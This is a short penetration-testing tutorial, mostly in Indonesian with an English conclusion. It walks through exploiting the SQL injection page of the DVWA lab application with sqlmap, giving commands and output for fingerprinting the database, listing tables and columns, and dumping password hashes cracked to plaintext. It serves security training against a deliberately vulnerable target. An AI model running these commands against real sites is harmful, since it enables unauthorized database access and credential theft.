DVWA: Exploit menggunakan sqlmap
Sumber: https://pentestlab.wordpress.com/2012/11/24/owning-the-database-with-sqlmap/
URL DVWA yang di serang
http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#
Enumerating database (-f)
sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -f
Hasilnya kira-kira
[09:38:21] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: active fingerprint: MySQL >= 5.5.0
comment injection fingerprint: MySQL 5.7.11
html error message fingerprint: MySQL
Fingerprinting database (-b)
sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -b
Hasilnya kira-kira
[09:41:30] [WARNING] reflective value(s) found and filtering out web server operating system: Linux Ubuntu 16.04 (xenial) web application technology: Apache 2.4.18 back-end DBMS operating system: Linux Ubuntu back-end DBMS: MySQL 5 banner: '5.7.11-0ubuntu6'
List databases (--dbs)
sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" --dbs
Hasilnya kira-kira
[09:48:29] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.04 (xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL 5 [09:48:29] [INFO] fetching database names available databases [5]: [*] dvwa [*] information_schema [*] mysql [*] performance_schema [*] sys
Cek tables di Database (-D namadatabase --tables)
sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -D dvwa --tables
Hasilnya kira-kira
09:50:45] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.04 (xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL 5 [09:50:45] [INFO] fetching tables for database: 'dvwa' Database: dvwa [2 tables] +-----------+ | guestbook | | users | +-----------+
Lihat struktur data sebuah tabel (-T namatabel --columns)
sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -T users --columns
Hasilnya kira-kira
[09:52:30] [INFO] fetching columns for table 'users' in database 'dvwa' Database: dvwa Table: users [8 columns] +--------------+-------------+ | Column | Type | +--------------+-------------+ | user | varchar(15) | | avatar | varchar(70) | | failed_login | int(3) | | first_name | varchar(15) | | last_login | timestamp | | last_name | varchar(15) | | password | varchar(32) | | user_id | int(6) | +--------------+-------------+
Dump Password (-C password --dump)
sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -C password --dump
Hasilnya kira-kira,
Database: dvwa Table: users [5 entries] +---------------------------------------------+ | password | +---------------------------------------------+ | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | | e99a18c428cb38d5f260853678922e03 (abc123) | +---------------------------------------------+ [09:54:53] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/192.168.0.100/dump/dvwa/users.csv'
As we can see from the image above sqlmap discovered password hashes on the column password and cracked them successfully by using a dictionary attack.Now we have and the passwords along with the usernames of the DVWA users which means that the database and the application have been compromised completely.
Conclusion
In this tutorial we saw how effective is the sqlmap tool when we have to identify and exploit SQL injection vulnerabilities.Of course the proper way to exploit the SQL Injection vulnerability is manually.However in many penetration tests due to time constraints the use of sqlmap is necessary.
Specifically in this case sqlmap managed to enumerate the database successfully and to extract data from the database tables very fast.Of course it has many more capabilities like that it can check for the existence of WAF (Web Application Firewall),IDS and IPS as well as that it can execute operating systems commands.For all these reasons this tool must be in the toolkit of every penetration tester.